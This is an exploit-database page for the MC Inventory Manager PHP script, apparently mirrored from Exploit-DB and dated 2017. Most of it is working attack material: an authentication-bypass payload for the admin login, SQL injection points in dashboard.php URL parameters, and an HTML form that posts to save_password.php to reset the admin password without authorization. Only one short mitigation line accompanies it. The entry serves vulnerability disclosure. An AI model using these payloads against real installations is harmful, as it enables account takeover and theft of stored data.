header-logo
Suggest Exploit
vendor:
MC Inventory Manager
by:
İhsan Şencan
8,8
CVSS
HIGH
Admin Login Bypass & SQLi
89, 89, 89
CWE
Product Name: MC Inventory Manager
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2017

Admin Login Bypass & SQLi

Admin Login Bypass: By setting the Username and Password to 'or''=' and hitting enter, an attacker can bypass the authentication process. SQLi: By manipulating the parameters of the URL, an attacker can inject malicious SQL code into the application. Other features have the same security vulnerability.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Authentication should be properly implemented to prevent bypass.
Source

Exploit-DB raw data:

# # # # # 
# Vulnerability: Admin Login Bypass & SQLi
# Date: 15.01.2017
# Vendor Homepage: http://microcode.ws/
# Script Name: MC Inventory Manager
# Script Buy Now: http://microcode.ws/product/mc-inventory-manager-php-script/3885
# Author: İhsan Şencan
# Author Web: http://ihsan.net
# Mail : ihsan[beygir]ihsan[nokta]net
# # # # # 
# Admin Login Bypass
# http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
# # # # # 
# http://localhost/[PATH]/dashboard.php?p=view_sell&id=[SQL]
# http://localhost/[PATH]//dashboard.php?p=edit_item&id=[SQL]
# E.t.c.... 
# Other features have the same security vulnerability.
# Exploit:
<html>
<body>
<form action="http://localhost/[PATH]/functions/save_password.php" method="post" parsley-validate>
<fieldset>
<label>Change Password : </label>
<input type="password" placeholder="Type new password" name="password" required/>
</fieldset>
<fieldset>
<label>Re-type Password : </label>
<input type="password" placeholder="Re-Type password again" name="repassword" required/>
</fieldset>
<button type="submit" class="btn btn-sm btn-success">Save
<i class="icon-arrow-right icon-on-right bigger-110"></i>
</button>
</form>
</body>
</html>
# # # # #
# # # # #

Navigation

Suggest Exploit

Services By CQR